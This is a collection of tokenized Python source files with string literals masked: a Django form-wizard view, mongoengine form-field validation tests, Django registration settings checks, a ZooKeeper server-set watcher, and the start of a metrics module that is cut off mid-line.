get_form_step_files ( self , form ) : <EOL> """<STR_LIT>""" <EOL> return form . files <EOL> def get_all_cleaned_data ( self ) : <EOL> """<STR_LIT>""" <EOL> cleaned_data = { } <EOL> for form_key in self . get_form_list ( ) : <EOL> form_obj = self . get_form ( <EOL> step = form_key , <EOL> data = self . storage . get_step_data ( form_key ) , <EOL> files = self . storage . get_step_files ( form_key ) <EOL> ) <EOL> if form_obj . is_valid ( ) : <EOL> if isinstance ( form_obj . cleaned_data , ( tuple , list ) ) : <EOL> cleaned_data . update ( { <EOL> '<STR_LIT>' % form_key : form_obj . cleaned_data <EOL> } ) <EOL> else : <EOL> cleaned_data . update ( form_obj . cleaned_data ) <EOL> return cleaned_data <EOL> def get_cleaned_data_for_step ( self , step ) : <EOL> """<STR_LIT>""" <EOL> if step in self . form_list : <EOL> form_obj = self . get_form ( step = step , <EOL> data = self . storage . get_step_data ( step ) , <EOL> files = self . storage . get_step_files ( step ) ) <EOL> if form_obj . is_valid ( ) : <EOL> return form_obj . cleaned_data <EOL> return None <EOL> def get_next_step ( self , step = None ) : <EOL> """<STR_LIT>""" <EOL> if step is None : <EOL> step = self . steps . current <EOL> form_list = self . get_form_list ( ) <EOL> key = form_list . keyOrder . index ( step ) + <NUM_LIT:1> <EOL> if len ( form_list . keyOrder ) > key : <EOL> return form_list . keyOrder [ key ] <EOL> return None <EOL> def get_prev_step ( self , step = None ) : <EOL> """<STR_LIT>""" <EOL> if step is None : <EOL> step = self . steps . current <EOL> form_list = self . get_form_list ( ) <EOL> key = form_list . keyOrder . index ( step ) - <NUM_LIT:1> <EOL> if key >= <NUM_LIT:0> : <EOL> return form_list . keyOrder [ key ] <EOL> return None <EOL> def get_step_index ( self , step = None ) : <EOL> """<STR_LIT>""" <EOL> if step is None : <EOL> step = self . steps . current <EOL> return self . get_form_list ( ) . keyOrder . index ( step ) <EOL> def get_context_data ( self , form , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> context = super ( WizardView , self ) . get_context_data ( * args , ** kwargs ) <EOL> context . update ( self . storage . extra_data ) <EOL> context [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : self . steps , <EOL> '<STR_LIT>' : ManagementForm ( prefix = self . prefix , initial = { <EOL> '<STR_LIT>' : self . steps . current , <EOL> } ) , <EOL> } <EOL> return context <EOL> def render ( self , form = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> form = form or self . get_form ( ) <EOL> context = self . get_context_data ( form , ** kwargs ) <EOL> return self . render_to_response ( context ) <EOL> def done ( self , form_list , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . __class__ . __name__ ) <EOL> class SessionWizardView ( WizardView ) : <EOL> """<STR_LIT>""" <EOL> storage_name = '<STR_LIT>' <EOL> class CookieWizardView ( WizardView ) : <EOL> """<STR_LIT>""" <EOL> storage_name = '<STR_LIT>' <EOL> class NamedUrlWizardView ( WizardView ) : <EOL> """<STR_LIT>""" <EOL> url_name = None <EOL> done_step_name = None <EOL> @ classmethod <EOL> def get_initkwargs ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> assert '<STR_LIT>' in kwargs , '<STR_LIT>' <EOL> extra_kwargs = { <EOL> '<STR_LIT>' : kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . pop ( '<STR_LIT>' ) , <EOL> } <EOL> initkwargs = super ( NamedUrlWizardView , cls ) . get_initkwargs ( * args , ** kwargs ) <EOL> initkwargs . update ( extra_kwargs ) <EOL> assert initkwargs [ '<STR_LIT>' ] not in initkwargs [ '<STR_LIT>' ] , '<STR_LIT>' % initkwargs [ '<STR_LIT>' ] <EOL> return initkwargs <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> step_url = kwargs . get ( '<STR_LIT>' , None ) <EOL> if step_url is None : <EOL> if '<STR_LIT>' in self . request . GET : <EOL> self . storage . reset ( ) <EOL> self . storage . current_step = self . steps . first <EOL> if self . request . GET : <EOL> query_string = "<STR_LIT>" % self . request . GET . urlencode ( ) <EOL> else : <EOL> query_string = "<STR_LIT>" <EOL> next_step_url = reverse ( self . url_name , kwargs = { <EOL> '<STR_LIT>' : self . steps . current , <EOL> } ) + query_string <EOL> return redirect ( next_step_url ) <EOL> elif step_url == self . done_step_name : <EOL> last_step = self . steps . last <EOL> return self . render_done ( self . get_form ( step = last_step , <EOL> data = self . storage . get_step_data ( last_step ) , <EOL> files = self . storage . get_step_files ( last_step ) <EOL> ) , ** kwargs ) <EOL> elif step_url == self . steps . current : <EOL> return self . render ( self . get_form ( <EOL> data = self . storage . current_step_data , <EOL> files = self . storage . current_step_data , <EOL> ) , ** kwargs ) <EOL> elif step_url in self . get_form_list ( ) : <EOL> self . storage . current_step = step_url <EOL> return self . render ( self . get_form ( <EOL> data = self . storage . current_step_data , <EOL> files = self . storage . current_step_data , <EOL> ) , ** kwargs ) <EOL> else : <EOL> self . storage . current_step = self . steps . first <EOL> return redirect ( self . url_name , step = self . steps . first ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> prev_step = self . request . POST . get ( '<STR_LIT>' , None ) <EOL> if prev_step and prev_step in self . get_form_list ( ) : <EOL> self . storage . current_step = prev_step <EOL> return redirect ( self . url_name , step = prev_step ) <EOL> return super ( NamedUrlWizardView , self ) . post ( * args , ** kwargs ) <EOL> def render_next_step ( self , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> next_step = self . get_next_step ( ) <EOL> self . storage . current_step = next_step <EOL> return redirect ( self . url_name , step = next_step ) <EOL> def render_revalidation_failure ( self , failed_step , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . storage . current_step = failed_step <EOL> return redirect ( self . url_name , step = failed_step ) <EOL> def render_done ( self , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if kwargs . get ( '<STR_LIT>' , None ) != self . done_step_name : <EOL> return redirect ( self . url_name , step = self . done_step_name ) <EOL> return super ( NamedUrlWizardView , self ) . render_done ( form , ** kwargs ) <EOL> class NamedUrlSessionWizardView ( NamedUrlWizardView ) : <EOL> """<STR_LIT>""" <EOL> storage_name = '<STR_LIT>' <EOL> class NamedUrlCookieWizardView ( NamedUrlWizardView ) : <EOL> """<STR_LIT>""" <EOL> storage_name = '<STR_LIT>' </s>
<s> from decimal import Decimal <EOL> from mongoengine import Document , EmbeddedDocument <EOL> from mongoengine . fields import * <EOL> from mongoforms . fields import MongoFormFieldGenerator <EOL> from testprj . tests import MongoengineTestCase <EOL> class _FieldValidateTestCase ( MongoengineTestCase ) : <EOL> field_class = None <EOL> correct_samples = ( ) <EOL> incorrect_samples = ( ) <EOL> is_not_implemented = False <EOL> def setUp ( self ) : <EOL> self . generator = MongoFormFieldGenerator ( ) <EOL> def get_field ( self ) : <EOL> class TestDocument ( Document ) : <EOL> test_field = self . field_class ( ) <EOL> return TestDocument . _fields [ '<STR_LIT>' ] <EOL> def get_form_field ( self ) : <EOL> return self . generator . generate ( '<STR_LIT>' , self . get_field ( ) ) <EOL> def runTest ( self ) : <EOL> if self . is_not_implemented : <EOL> return <EOL> for dirty_value , clean_value in self . correct_samples : <EOL> self . assertEqual ( <EOL> clean_value , <EOL> self . get_form_field ( ) . validate ( dirty_value ) ) <EOL> for value in self . incorrect_samples : <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> lambda : self . get_form_field ( ) . validate ( value ) ) <EOL> class Test001StringFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = StringField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test002IntFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = IntField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test003FloatFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = FloatField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test004BooleanFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = BooleanField <EOL> correct_samples = [ ( '<STR_LIT:1>' , None ) , ( '<STR_LIT:0>' , None ) ] <EOL> class Test005DateTimeFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = DateTimeField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test006EmbeddedDocumentFieldValidate ( _FieldValidateTestCase ) : <EOL> is_not_implemented = True <EOL> def get_field ( self ) : <EOL> class TestEmbeddedDocument ( EmbeddedDocument ) : <EOL> pass <EOL> class TestDocument ( Document ) : <EOL> test_field = EmbeddedDocumentField ( TestEmbeddedDocument ) <EOL> return TestDocument . _fields [ '<STR_LIT>' ] <EOL> class Test007ListFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = ListField <EOL> is_not_implemented = True <EOL> class Test008DictFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = DictField <EOL> is_not_implemented = True <EOL> class Test009ObjectIdFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = ObjectIdField <EOL> is_not_implemented = True <EOL> class Test010ReferenceFieldValidate ( _FieldValidateTestCase ) : <EOL> correct_samples = [ ] <EOL> def get_field ( self ) : <EOL> class TestDocument ( Document ) : <EOL> test_field = ReferenceField ( '<STR_LIT>' ) <EOL> return TestDocument . _fields [ '<STR_LIT>' ] <EOL> class Test011MapFieldValidate ( _FieldValidateTestCase ) : <EOL> is_not_implemented = True <EOL> def get_field ( self ) : <EOL> class TestDocument ( Document ) : <EOL> test_field = MapField ( StringField ( ) ) <EOL> return TestDocument . _fields [ '<STR_LIT>' ] <EOL> class Test012DecimalFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = DecimalField <EOL> correct_samples = [ ( Decimal ( '<STR_LIT>' ) , Decimal ( '<STR_LIT>' ) ) ] <EOL> class Test013ComplexDateTimeFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = ComplexDateTimeField <EOL> is_not_implemented = True <EOL> class Test014URLFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = URLField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test015GenericReferenceFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = GenericReferenceField <EOL> is_not_implemented = True <EOL> class Test016FileFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = FileField <EOL> is_not_implemented = True <EOL> class Test017BinaryFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = BinaryField <EOL> is_not_implemented = True <EOL> class Test018SortedListFieldValidate ( _FieldValidateTestCase ) : <EOL> is_not_implemented = True <EOL> def get_field ( self ) : <EOL> class TestDocument ( Document ) : <EOL> test_field = SortedListField ( StringField ) <EOL> return TestDocument . _fields [ '<STR_LIT>' ] <EOL> class Test019EmailFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = EmailField <EOL> correct_samples = [ ( '<STR_LIT>' , None ) ] <EOL> class Test020GeoPointFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = GeoPointField <EOL> is_not_implemented = True <EOL> class Test021ImageFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = ImageField <EOL> is_not_implemented = True <EOL> class Test022SequenceFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = SequenceField <EOL> is_not_implemented = True <EOL> class Test023UUIDFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = UUIDField <EOL> is_not_implemented = True <EOL> class Test024GenericEmbeddedDocumentFieldValidate ( _FieldValidateTestCase ) : <EOL> field_class = GenericEmbeddedDocumentField <EOL> is_not_implemented = True </s>
<s> import sys <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> class Settings ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . defaults = kwargs <EOL> def __getattr__ ( self , key ) : <EOL> return getattr ( settings , '<STR_LIT>' % key , self . defaults [ key ] ) <EOL> up_settings = Settings ( <EOL> REGISTRATION_FORM = '<STR_LIT>' , <EOL> DOUBLE_CHECK_EMAIL = False , <EOL> CHECK_UNIQUE_EMAIL = False , <EOL> DOUBLE_CHECK_PASSWORD = False , <EOL> REGISTRATION_FULLNAME = False , <EOL> REGISTRATION_REDIRECT = '<STR_LIT>' , <EOL> EMAIL_ONLY = False , <EOL> AUTO_LOGIN = False , <EOL> USE_ACCOUNT_VERIFICATION = False , <EOL> ACCOUNT_VERIFICATION_DAYS = <NUM_LIT:7> , <EOL> USE_EMAIL_VERIFICATION = False , <EOL> EMAIL_VERIFICATION_DAYS = <NUM_LIT:2> , <EOL> EMAIL_VERIFICATION_DONE_URL = '<STR_LIT>' , <EOL> USE_PROFILE = False , <EOL> PROFILE_FORM = '<STR_LIT>' , <EOL> PROFILE_ALLOW_EMAIL_CHANGE = False , <EOL> PROFILE_CHANGE_DONE_URL = '<STR_LIT>' , <EOL> INLINE_PROFILE_ADMIN = False , <EOL> ) <EOL> def validate_settings ( ) : <EOL> if ( up_settings . USE_ACCOUNT_VERIFICATION and <EOL> '<STR_LIT>' not in settings . INSTALLED_APPS ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if up_settings . USE_ACCOUNT_VERIFICATION and up_settings . AUTO_LOGIN : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" ) <EOL> if up_settings . USE_PROFILE and '<STR_LIT>' not in settings . INSTALLED_APPS : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if up_settings . PROFILE_ALLOW_EMAIL_CHANGE and up_settings . CHECK_UNIQUE_EMAIL : <EOL> raise ImproperlyConfigured ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ( up_settings . USE_EMAIL_VERIFICATION and <EOL> '<STR_LIT>' not in settings . INSTALLED_APPS ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if up_settings . PROFILE_ALLOW_EMAIL_CHANGE and up_settings . USE_EMAIL_VERIFICATION : <EOL> raise ImproperlyConfigured ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ( '<STR_LIT:test>' not in sys . argv and not up_settings . USE_EMAIL_VERIFICATION and <EOL> '<STR_LIT>' in settings . INSTALLED_APPS ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> validate_settings ( ) </s>
<s> import json <EOL> import logging <EOL> import posixpath <EOL> import gevent <EOL> from gevent . event import Event <EOL> from gevent . queue import Queue <EOL> from kazoo . client import KazooClient <EOL> from kazoo . exceptions import NoNodeError <EOL> from kazoo . recipe . watchers import ( ChildrenWatch , DataWatch ) <EOL> ROOT_LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class Endpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port ) : <EOL> self . _host = host <EOL> self . _port = port <EOL> def _key ( self ) : <EOL> return self . host , self . port <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . _key ( ) == other . _key ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _host ) ^ hash ( self . _port ) <EOL> @ property <EOL> def host ( self ) : <EOL> return self . _host <EOL> @ property <EOL> def port ( self ) : <EOL> return self . _port <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . host , self . port ) <EOL> class Member ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def from_node ( cls , member , data ) : <EOL> blob = json . loads ( data ) <EOL> additional_endpoints = blob . get ( '<STR_LIT>' ) <EOL> if additional_endpoints is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> service_endpoint = blob . get ( '<STR_LIT>' ) <EOL> if service_endpoint is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> status = blob . get ( '<STR_LIT:status>' ) <EOL> if status is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> shard = blob . get ( '<STR_LIT>' ) <EOL> if shard is not None : <EOL> try : <EOL> shard = int ( shard ) <EOL> except ValueError : <EOL> ROOT_LOG . warn ( '<STR_LIT>' % shard ) <EOL> shard = None <EOL> return cls ( <EOL> member = member , <EOL> service_endpoint = Endpoint ( service_endpoint [ '<STR_LIT:host>' ] , service_endpoint [ '<STR_LIT:port>' ] ) , <EOL> additional_endpoints = dict ( ( name , Endpoint ( value [ '<STR_LIT:host>' ] , value [ '<STR_LIT:port>' ] ) ) <EOL> for name , value in additional_endpoints . items ( ) ) , <EOL> shard = shard , <EOL> status = status <EOL> ) <EOL> def __init__ ( <EOL> self , <EOL> member , <EOL> service_endpoint , <EOL> additional_endpoints , <EOL> shard , <EOL> status ) : <EOL> self . _name = member <EOL> self . _service_endpoint = service_endpoint <EOL> self . _additional_endpoints = additional_endpoints <EOL> self . _status = status <EOL> self . _shard = shard <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _name <EOL> @ property <EOL> def service_endpoint ( self ) : <EOL> return self . _service_endpoint <EOL> @ property <EOL> def additional_endpoints ( self ) : <EOL> return self . _additional_endpoints <EOL> @ property <EOL> def status ( self ) : <EOL> return self . _status <EOL> @ property <EOL> def shard ( self ) : <EOL> return self . _shard <EOL> def __addl_endpoints_str ( self ) : <EOL> return [ '<STR_LIT>' % ( k , v ) for k , v in self . additional_endpoints . items ( ) ] <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . service_endpoint , <EOL> ( '<STR_LIT>' % self . _shard ) if self . _shard is not None else '<STR_LIT>' , <EOL> '<STR_LIT>' . join ( self . __addl_endpoints_str ( ) ) , <EOL> self . status <EOL> ) <EOL> def _key ( self ) : <EOL> return ( <EOL> self . service_endpoint , <EOL> frozenset ( sorted ( self . __addl_endpoints_str ( ) ) ) , <EOL> self . status , <EOL> self . _shard ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . _key ( ) == other . _key ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _key ( ) ) <EOL> class ServerSet ( object ) : <EOL> """<STR_LIT>""" <EOL> class _CallbackBlocker ( object ) : <EOL> def __init__ ( self ) : <EOL> self . event = Event ( ) <EOL> self . event . set ( ) <EOL> self . _count = <NUM_LIT:0> <EOL> def __enter__ ( self ) : <EOL> if self . _count == <NUM_LIT:0> : <EOL> self . event . clear ( ) <EOL> self . _count += <NUM_LIT:1> <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> self . _count -= <NUM_LIT:1> <EOL> if self . _count == <NUM_LIT:0> : <EOL> self . event . set ( ) <EOL> def ensure_safe ( self ) : <EOL> self . event . wait ( ) <EOL> def is_blocking ( self ) : <EOL> return self . _count != <NUM_LIT:0> <EOL> def __init__ ( self , zk , zk_path , on_join = None , on_leave = None , <EOL> member_filter = None , member_factory = None ) : <EOL> """<STR_LIT>""" <EOL> def noop ( * args , ** kwargs ) : pass <EOL> def true ( * args , ** kwargs ) : return True <EOL> self . _log = ROOT_LOG . getChild ( '<STR_LIT>' % zk_path ) <EOL> self . _log . info ( '<STR_LIT>' % zk_path ) <EOL> if not isinstance ( zk , KazooClient ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if not zk . connected : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . _zk_path = zk_path <EOL> self . _zk = zk <EOL> self . _nodes = set ( ) <EOL> self . _members = { } <EOL> self . _on_join = on_join or noop <EOL> self . _on_leave = on_leave or noop <EOL> self . _notification_queue = Queue ( <NUM_LIT:0> ) <EOL> self . _watching = False <EOL> self . _cb_blocker = self . _CallbackBlocker ( ) <EOL> self . _member_filter = member_filter or true <EOL> self . _member_factory = member_factory or Member . from_node <EOL> self . _running = True <EOL> self . _worker = gevent . spawn ( self . _notification_worker ) <EOL> if on_join or on_leave : <EOL> self . _monitor ( ) <EOL> def stop ( self ) : <EOL> self . _running = False <EOL> if self . _worker : <EOL> self . _worker . kill ( block = False ) <EOL> def __iter__ ( self ) : <EOL> with self . _cb_blocker : <EOL> try : <EOL> nodes = self . _zk . get_children ( self . _zk_path ) <EOL> except NoNodeError : <EOL> nodes = ( ) <EOL> members = self . _zk_nodes_to_members ( nodes ) <EOL> return ( n for n in members ) <EOL> def get_members ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self ) <EOL> def _get_info ( self , member ) : <EOL> """<STR_LIT>""" <EOL> info = self . _zk . get ( posixpath . join ( self . _zk_path , member ) ) <EOL> return info [ <NUM_LIT:0> ] <EOL> def _safe_zk_node_to_member ( self , node ) : <EOL> try : <EOL> return self . _member_factory ( node , self . _get_info ( node ) ) <EOL> except NoNodeError : <EOL> return None <EOL> def _zk_nodes_to_members ( self , nodes ) : <EOL> return [ m for m in ( self . _safe_zk_node_to_member ( n ) for n in nodes <EOL> if self . _member_filter ( n ) ) <EOL> if m ] <EOL> def _monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _zk . exists ( self . _zk_path ) : <EOL> self . _log . warn ( '<STR_LIT>' <EOL> % self . _zk_path ) <EOL> DataWatch ( self . _zk , self . _zk_path , self . _data_changed ) <EOL> def _data_changed ( self , data , stat ) : <EOL> if stat is None : <EOL> self . _watching = False <EOL> self . _send_all_removed ( ) <EOL> elif not self . _watching : <EOL> self . _watching = True <EOL> self . _begin_watch ( ) <EOL> def _begin_watch ( self ) : <EOL> self . _log . info ( '<STR_LIT>' % self . _zk_path ) <EOL> ChildrenWatch ( self . _zk , self . _zk_path , self . _on_set_changed ) <EOL> def _send_all_removed ( self ) : <EOL> for k in self . _members . keys ( ) : <EOL> member = self . _members . pop ( k ) <EOL> self . _on_leave ( member ) <EOL> def _notification_worker ( self ) : <EOL> """<STR_LIT>""" <EOL> while self . _running : <EOL> work = self . _notification_queue . get ( ) <EOL> self . _cb_blocker . ensure_safe ( ) <EOL> try : <EOL> new_nodes , removed_nodes = work <EOL> new_members = self . _zk_nodes_to_members ( new_nodes ) <EOL> self . _members . update ( ( ( m . name , m ) for m in new_members ) ) <EOL> self . _log . debug ( "<STR_LIT>" <EOL> % ( len ( new_nodes ) , len ( removed_nodes ) ) ) <EOL> for m in removed_nodes : <EOL> removed_member = self . _members . pop ( m , None ) <EOL> if removed_member : <EOL> try : <EOL> self . _on_leave ( removed_member ) <EOL> except Exception : <EOL> self . _log . exception ( '<STR_LIT>' ) <EOL> else : <EOL> self . _log . warn ( '<STR_LIT>' % str ( m ) ) <EOL> for m in new_members : <EOL> try : <EOL> self . _on_join ( m ) <EOL> except Exception : <EOL> self . _log . exception ( '<STR_LIT>' ) <EOL> except Exception : <EOL> self . _log . exception ( '<STR_LIT>' ) <EOL> def _on_set_changed ( self , children ) : <EOL> """<STR_LIT>""" <EOL> children = set ( [ c for c in children if self . _member_filter ( c ) ] ) <EOL> current_nodes = set ( self . _nodes ) <EOL> self . _nodes = children <EOL> new_nodes = children - current_nodes <EOL> removed_nodes = current_nodes - children <EOL> self . _log . debug ( "<STR_LIT>" ) <EOL> self . _notification_queue . put ( ( new_nodes , removed_nodes ) ) </s>
<s> from __future__ import absolute_import <EOL> from contextlib import contextmanager <EOL> from collections import defaultdict , deque , namedtuple <EOL> import functools <EOL> import itertools <EOL> import math <EOL> import random <EOL> import socket <EOL> import time <EOL> import gevent <EOL> from . timer_queue import LOW_RESOLUTION_TIME_SOURCE <EOL> class VarzType ( object ) : <EOL> Gauge = <NUM_LIT:1> <EOL> Rate = <NUM_LIT:2> <EOL> AggregateTimer = <NUM_LIT:3> <EOL> Counter = <NUM_LIT:4> <EOL> AverageTimer = <NUM_LIT:5> <EOL> AverageRate = <NUM_LIT:6> <EOL> class Source ( object ) : <EOL> __slots__ = "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> def __init__ ( self , method = None , service = None , endpoint = None , client_id = None ) : <EOL> self . method = method <EOL> self . service = service <EOL> self . endpoint = endpoint <EOL> self . client_id = client_id <EOL> def to_tuple ( self ) : <EOL> return ( self . method , self . service , self . endpoint , self . client_id ) <EOL> def to_dict ( self ) : <EOL> return { <EOL> "<STR_LIT>" : self . method , <EOL> "<STR_LIT>" : self . service , <EOL> "<STR_LIT>" : self . endpoint , <EOL> "<STR_LIT>" : self . client_id , <EOL> } <EOL> def __cmp__ ( self , other ) : <EOL> if not isinstance ( other , Source ) : <EOL> return - <NUM_LIT:1> <EOL> return cmp ( self . to_tuple ( ) , other . to_tuple ( ) ) <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . method , self . service , self . endpoint , self . client_id ) ) <EOL> class VarzMetric ( object ) : <EOL> """<STR_LIT>""" <EOL> VARZ_TYPE = None <EOL> @ staticmethod <EOL> def _Adapt ( fn ) : <EOL> def __Adapt ( metric , source , amount = <NUM_LIT:1> ) : <EOL> fn ( source , metric , amount ) <EOL> return __Adapt <EOL> def __init__ ( self , metric , source ) : <EOL> """<STR_LIT>""" <EOL> self . _metric = metric <EOL> self . _source = source <EOL> if self . VARZ_TYPE == VarzType . Gauge : <EOL> self . _fn = VarzReceiver . SetVarz <EOL> elif self . VARZ_TYPE in ( VarzType . AverageTimer , VarzType . AverageRate ) : <EOL> self . _fn = VarzReceiver . RecordPercentileSample <EOL> else : <EOL> self . _fn = VarzReceiver . IncrementVarz <EOL> if source : <EOL> self . _fn = functools . partial ( self . _fn , self . _source ) <EOL> else : <EOL> self . _fn = self . _Adapt ( self . _fn ) <EOL> def __call__ ( self , * args ) : <EOL> self . _fn ( self . _metric , * args ) <EOL> def ForSource ( self , source ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( source , Source ) : <EOL> raise ValueError ( "<STR_LIT>" , type ( source ) ) <EOL> return type ( self ) ( self . _metric , source ) <EOL> class Gauge ( VarzMetric ) : VARZ_TYPE = VarzType . Gauge <EOL> class Rate ( VarzMetric ) : VARZ_TYPE = VarzType . Rate <EOL> class AverageRate ( VarzMetric ) : VARZ_TYPE = VarzType . AverageRate <EOL> class Counter ( Rate ) : VARZ_TYPE = VarzType . Counter <EOL> class VarzTimerBase ( VarzMetric ) : <EOL> """<STR_LIT>""" <EOL> @ contextmanager <EOL> def Measure ( self , source = None ) : <EOL> start_time = time . time ( ) <EOL> yield <EOL> end_time = time . time ( ) <EOL> if source : <EOL> self ( source , end_time - start_time ) <EOL> else : <EOL> self ( end_time - start_time ) <EOL> class AverageTimer ( VarzTimerBase ) : VARZ_TYPE = VarzType . AverageTimer <EOL> class AggregateTimer ( VarzTimerBase ) : VARZ_TYPE = VarzType . AggregateTimer <EOL> class VarzMeta ( type ) : <EOL> def __new__ ( mcs , name , bases , dct ) : <EOL> base_name = dct [ '<STR_LIT>' ] <EOL> for metric_suffix , varz_cls in dct [ '<STR_LIT>' ] . iteritems ( ) : <EOL> metric_name = '<STR_LIT>' % ( base_name , metric_suffix ) <EOL> VarzReceiver . RegisterMetric ( metric_name , varz_cls . VARZ_TYPE ) <EOL> varz = varz_cls ( metric_name , None ) <EOL> dct [ '<STR_LIT>' ] [ metric_suffix ] = varz <EOL> dct [ metric_suffix ] = varz <EOL> return super ( VarzMeta , mcs ) . __new__ ( mcs , name , bases , dct ) <EOL> def VerifySource ( source ) : <EOL> if not isinstance ( source , Source ) : <EOL> raise ValueError ( "<STR_LIT>" , source ) <EOL> return source <EOL> class VarzBase ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = VarzMeta <EOL> _VARZ = { } <EOL> _VARZ_BASE_NAME = None <EOL> def __init__ ( self , source ) : <EOL> source = VerifySource ( source ) <EOL> for k , v in self . _VARZ . iteritems ( ) : <EOL> setattr ( self , k , v . ForSource ( source ) ) <EOL> def __getattr__ ( self , item ) : <EOL> return self . _VARZ [ item ] <EOL> class _SampleSet ( object ) : <EOL> __slots__ = ( '<STR_LIT:data>' , '<STR_LIT:i>' , '<STR_LIT:p>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , max_size , data = None , p = <NUM_LIT> ) : <EOL> data = data or [ ] <EOL> self . data = deque ( data , max_size ) <EOL> self . i = len ( data ) <EOL> self . p = p <EOL> self . max_size = max_size <EOL> self . last_update = LOW_RESOLUTION_TIME_SOURCE . now <EOL> def Sample ( self , value ) : <EOL> if self . i < self . max_size : <EOL> self . data . append ( value ) <EOL> self . last_update = LOW_RESOLUTION_TIME_SOURCE . now <EOL> else : <EOL> j = random . random ( ) <EOL> if j < self . p : <EOL> self . data . append ( value ) <EOL> self . last_update = LOW_RESOLUTION_TIME_SOURCE . now <EOL> self . i += <NUM_LIT:1> <EOL> class VarzReceiver ( object ) : <EOL> """<STR_LIT>""" <EOL> VARZ_METRICS = { } <EOL> VARZ_DATA = defaultdict ( lambda : defaultdict ( int ) ) <EOL> VARZ_PERCENTILES = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _MAX_PERCENTILE_SIZE = <NUM_LIT:1000> <EOL> @ staticmethod <EOL> def RegisterMetric ( metric , varz_type ) : <EOL> VarzReceiver . VARZ_METRICS [ metric ] = varz_type <EOL> @ staticmethod <EOL> def IncrementVarz ( source , metric , amount = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> VarzReceiver . VARZ_DATA [ metric ] [ VerifySource ( source ) ] += amount <EOL> @ staticmethod <EOL> def SetVarz ( source , metric , value ) : <EOL> """<STR_LIT>""" <EOL> VarzReceiver . VARZ_DATA [ metric ] [ VerifySource ( source ) ] = value <EOL> @ classmethod <EOL> def RecordPercentileSample ( cls , source , metric , value ) : <EOL> source = VerifySource ( source ) <EOL> reservoir = cls . VARZ_DATA [ metric ] [ source ] <EOL> if reservoir == 